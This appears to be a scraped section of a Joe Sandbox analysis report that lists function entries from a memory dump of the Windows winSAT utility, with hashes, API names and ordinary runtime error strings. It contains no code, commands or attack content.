                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: p not in the string
                                                                                                                                                                                              • API String ID: 0-2514759739
                                                                                                                                                                                              • Opcode ID: e4cbd53a27ed1f541696983f909681d8a3957797a0b29350643488e4c6a9fbf0
                                                                                                                                                                                              • Instruction ID: 63775011ad79b0cdb5f510898c187cbbb5115a95f7b3d40170f80a3f882bb13c
                                                                                                                                                                                              • Opcode Fuzzy Hash: e4cbd53a27ed1f541696983f909681d8a3957797a0b29350643488e4c6a9fbf0
                                                                                                                                                                                              • Instruction Fuzzy Hash: F4416022B08A4680DB14EF26E4913ADA361FB95F94FE09131DA5E073E5CF7CE456C350
                                                                                                                                                                                              Function 00007FF780FA8810 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: invlaid size for new_size
                                                                                                                                                                                              • API String ID: 1480402491-1920837235
                                                                                                                                                                                              • Opcode ID: 344bc5fe4f200486b3f8735b126d2b10098b2ff794b6511c2b402672e5507677
                                                                                                                                                                                              • Instruction ID: 0b83188f1e97482ba9b7ae37c5b787cd34c82189444f912da140cd50304f88fa
                                                                                                                                                                                              • Opcode Fuzzy Hash: 344bc5fe4f200486b3f8735b126d2b10098b2ff794b6511c2b402672e5507677
                                                                                                                                                                                              • Instruction Fuzzy Hash: A731A562B08A4680EE14BB17E450279E3A1BF44BE8FA89131DA9D077D5DF7CE452C320
                                                                                                                                                                                              Function 00007FF780F98C2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModuleStringType
                                                                                                                                                                                              • String ID: CompletionStatus$description
                                                                                                                                                                                              • API String ID: 4214639954-1512143762
                                                                                                                                                                                              • Opcode ID: 4c281ec7b35b35f8318b083f0c092fd7e133b0c76becdd6ff250dd63647c5085
                                                                                                                                                                                              • Instruction ID: 44e74b62a326b1e42cdee001a07bf6bff328544d8f59b698fc72a82c1c7f2f14
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c281ec7b35b35f8318b083f0c092fd7e133b0c76becdd6ff250dd63647c5085
                                                                                                                                                                                              • Instruction Fuzzy Hash: 02418322B09B0195EB00EB65D8513EC77A1BF44768F90A131DA0E4B7E6DF78E959C350
                                                                                                                                                                                              Function 00007FF780FAA948 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ___lc_codepage_func___lc_handle_funclocaleconv
                                                                                                                                                                                              • String ID: false$true
                                                                                                                                                                                              • API String ID: 2364079633-2658103896
                                                                                                                                                                                              • Opcode ID: 23828b915d4e0ae572e754ad8fd8cee005fcc44009ed9c6e7f839333a6727768
                                                                                                                                                                                              • Instruction ID: a6f1bd8093ea335dc7abea956371a68ab2cc2bdab90ac26bf1d59d015e637d94
                                                                                                                                                                                              • Opcode Fuzzy Hash: 23828b915d4e0ae572e754ad8fd8cee005fcc44009ed9c6e7f839333a6727768
                                                                                                                                                                                              • Instruction Fuzzy Hash: 74416F63508B8192E710EB25E44019EB7E4FB847A0FA09235EBDD07BA5DF7CD0A9CB50
                                                                                                                                                                                              Function 00007FF780FA86A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowmallocstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: reserve is equal to npos
                                                                                                                                                                                              • API String ID: 2575240680-1415262529
                                                                                                                                                                                              • Opcode ID: c5bb44718548c05d380cafed3e3ba38d46e100f57c20b340653f7f5b4ae80c73
                                                                                                                                                                                              • Instruction ID: 47885399975e50277f35300b7a1cdfe2585a4f57238c7d3415a4f4a32ad3536d
                                                                                                                                                                                              • Opcode Fuzzy Hash: c5bb44718548c05d380cafed3e3ba38d46e100f57c20b340653f7f5b4ae80c73
                                                                                                                                                                                              • Instruction Fuzzy Hash: 34219326A0CA4580EB50EB26E451269B3A0BF45BE4FF49231DA6D077D5DF7CE412C760
                                                                                                                                                                                              Function 00007FF780FA8338 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: pos is greter than length
                                                                                                                                                                                              • API String ID: 1480402491-672107844
                                                                                                                                                                                              • Opcode ID: 24a249c6ab7209199c0410a201d11d9577aaf78771c9d7fd7dc51e5b67ac7989
                                                                                                                                                                                              • Instruction ID: 4a56b088f954d706807440313dd8524d79d058b94e962cc985f982402a9361d0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 24a249c6ab7209199c0410a201d11d9577aaf78771c9d7fd7dc51e5b67ac7989
                                                                                                                                                                                              • Instruction Fuzzy Hash: F711B4A1B1C78280EE60B712E8113B9A210BF55BA8FE0A231DA6D477D1DF6CF415C710
                                                                                                                                                                                              Function 00007FF780FA8978 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: pos is greater than string length
                                                                                                                                                                                              • API String ID: 1480402491-927503826
                                                                                                                                                                                              • Opcode ID: a3d748886562dba9ff42824ddac9caf1b5391840cd1e00183c0b5253ee5438e2
                                                                                                                                                                                              • Instruction ID: 35db4ef6c4c29ac06ecd58e734c1a66bb60cc7396df312f8ca62badee742af79
                                                                                                                                                                                              • Opcode Fuzzy Hash: a3d748886562dba9ff42824ddac9caf1b5391840cd1e00183c0b5253ee5438e2
                                                                                                                                                                                              • Instruction Fuzzy Hash: A611E661A1CA4680EE10F716F8517B99350BF99BD4FE06131EA5E037E2DE6CE156C710
                                                                                                                                                                                              Function 00007FF7810A4E70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                                              • API String ID: 1480402491-1799206989
                                                                                                                                                                                              • Opcode ID: be1d8c21d7ee3f6481f5d55a1fe96d7ded0db2a5d223960b112df610f920373f
                                                                                                                                                                                              • Instruction ID: 8df899cca031346e68aa41f93a0be0ea7351f6b8a60a37788d8a2dc36415f19c
                                                                                                                                                                                              • Opcode Fuzzy Hash: be1d8c21d7ee3f6481f5d55a1fe96d7ded0db2a5d223960b112df610f920373f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A112962A2DB8681DF10FB01F8412A8E360FB44760FE44232D55D067E4EFBCE545C720
                                                                                                                                                                                              Function 00007FF780FAC614 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: n is equal to npos
                                                                                                                                                                                              • API String ID: 1480402491-1397133512
                                                                                                                                                                                              • Opcode ID: 432fdd1150fd00a91c27c5e83cee7ce573169d03121ce404c2ea4128de2b112a
                                                                                                                                                                                              • Instruction ID: 243d49202fba99573f041e532fe6615a83a89a75b7bc7a9b6f56880f0c63b87b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 432fdd1150fd00a91c27c5e83cee7ce573169d03121ce404c2ea4128de2b112a
                                                                                                                                                                                              • Instruction Fuzzy Hash: DD110A61A1CB4585EE50E725E801365A3A0BB44BB8FF09330D5BD473D6EF6CE156C750
                                                                                                                                                                                              Function 00007FF780FC9DB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: n is equal to npos
                                                                                                                                                                                              • API String ID: 1480402491-1397133512
                                                                                                                                                                                              • Opcode ID: a40e51b2add9990d476b81021722185fca1117277a0c71a5a158a92b751de0e5
                                                                                                                                                                                              • Instruction ID: 37a0488a8cd4475f156eb79eda24b8cdb120bd8a6dcce97c7c0cd0a34031f9c8
                                                                                                                                                                                              • Opcode Fuzzy Hash: a40e51b2add9990d476b81021722185fca1117277a0c71a5a158a92b751de0e5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D11E371E1DB4681EE60E724E8053A5A3A0BB557B4FF09330D6BD463D2EE2CE146C720
                                                                                                                                                                                              Function 00007FF780FABF80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: n is equal to npos
                                                                                                                                                                                              • API String ID: 1480402491-1397133512
                                                                                                                                                                                              • Opcode ID: a56e1a8313d600a04dffc9f24096c87064267ef3a33ea9983d78aeba4a01a386
                                                                                                                                                                                              • Instruction ID: 988914f1f8be58d0b295784c2799204c6873664d1a41fc266390c46be8ed58f1
                                                                                                                                                                                              • Opcode Fuzzy Hash: a56e1a8313d600a04dffc9f24096c87064267ef3a33ea9983d78aeba4a01a386
                                                                                                                                                                                              • Instruction Fuzzy Hash: A8110661E18B4685EE60A725E801365A3A0BB457B8FF09330D67D473D2EF6CE156C710
                                                                                                                                                                                              Function 00007FF780FE16EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: base\winsat\mlib\mxmldom.cpp$cannot get text from an XML node
                                                                                                                                                                                              • API String ID: 0-3808574510
                                                                                                                                                                                              • Opcode ID: 7b1eedf36150c6d89b36d15e59500e28cdbdd8679d6886e9a5fef9680c7da983
                                                                                                                                                                                              • Instruction ID: 581ad8dc01d2471944c209506cf5917743e52879ab4e6a221f71e68908d03f17
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b1eedf36150c6d89b36d15e59500e28cdbdd8679d6886e9a5fef9680c7da983
                                                                                                                                                                                              • Instruction Fuzzy Hash: 82118432A0CB4182E7009B16E884069B764FB99BA0FB49335EBBD477E4CF38E541CB50
                                                                                                                                                                                              Function 00007FF780FABED4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowmemcpystd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: bufsizeP == npos
                                                                                                                                                                                              • API String ID: 2064173360-365732818
                                                                                                                                                                                              • Opcode ID: 274b02a7e7339dfa6fc1670b01fdd4a639736e48d595a7a2cf6559ae513f1588
                                                                                                                                                                                              • Instruction ID: 05cbeb0f706dc5c45bea6dcc96b11e585cf66004ab28735f5e963cf4129a10f0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 274b02a7e7339dfa6fc1670b01fdd4a639736e48d595a7a2cf6559ae513f1588
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7301C861A28A4582EB20E729E851369A351BB44774FF09330E6BD467D5DE7CD146C710
                                                                                                                                                                                              Function 00007FF780F9E924 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileHandleWrite
                                                                                                                                                                                              • String ID: ped
                                                                                                                                                                                              • API String ID: 3320372497-699262028
                                                                                                                                                                                              • Opcode ID: 7259f41d63e7516aa0fb7fdb7bb17415d68327f18a4c8a9ceec51de51e53a920
                                                                                                                                                                                              • Instruction ID: d9e623a56053eb9cbdbc0f98e2f9de44f9f745270f5c28bd4a61358fc4b2d036
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7259f41d63e7516aa0fb7fdb7bb17415d68327f18a4c8a9ceec51de51e53a920
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0811842260CAC2DAD760DF21E8001BAB770FB89365F915272DA8D82655DF7CD445CF10
                                                                                                                                                                                              Function 00007FF780FAA8B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: at is larger than buffer size
                                                                                                                                                                                              • API String ID: 1480402491-1724294285
                                                                                                                                                                                              • Opcode ID: 14a9bf9f0102a18dc08db66d1f8f921d544cde58858c86fd64909c94ae5e0084
                                                                                                                                                                                              • Instruction ID: 908ff14dbed8341e02414dc4292aaca59828bac3c61886d8af1358dfb52cac62
                                                                                                                                                                                              • Opcode Fuzzy Hash: 14a9bf9f0102a18dc08db66d1f8f921d544cde58858c86fd64909c94ae5e0084
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C012861B28A8581EB60E725E85136DB360FF857A0FE09231D5AD03BE5DF3CE406C710
                                                                                                                                                                                              Function 00007FF780FD6158 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateErrorFileLast
                                                                                                                                                                                              • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                                              • API String ID: 1214770103-2935326385
                                                                                                                                                                                              • Opcode ID: 6cce27e09e26122c475b376ae0f9fac36c40ee016db69fc92a342f9df983f907
                                                                                                                                                                                              • Instruction ID: b378e671099ce67b4282f954463d3e15cff956284ddcf93ea9954b1fe779cb94
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cce27e09e26122c475b376ae0f9fac36c40ee016db69fc92a342f9df983f907
                                                                                                                                                                                              • Instruction Fuzzy Hash: B4019232A1C64182E710AB10E85477ABA60FB85B74FA09334EA7D067E5CF7CE555CB50
                                                                                                                                                                                              Function 00007FF780F9330C Relevance: 5.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
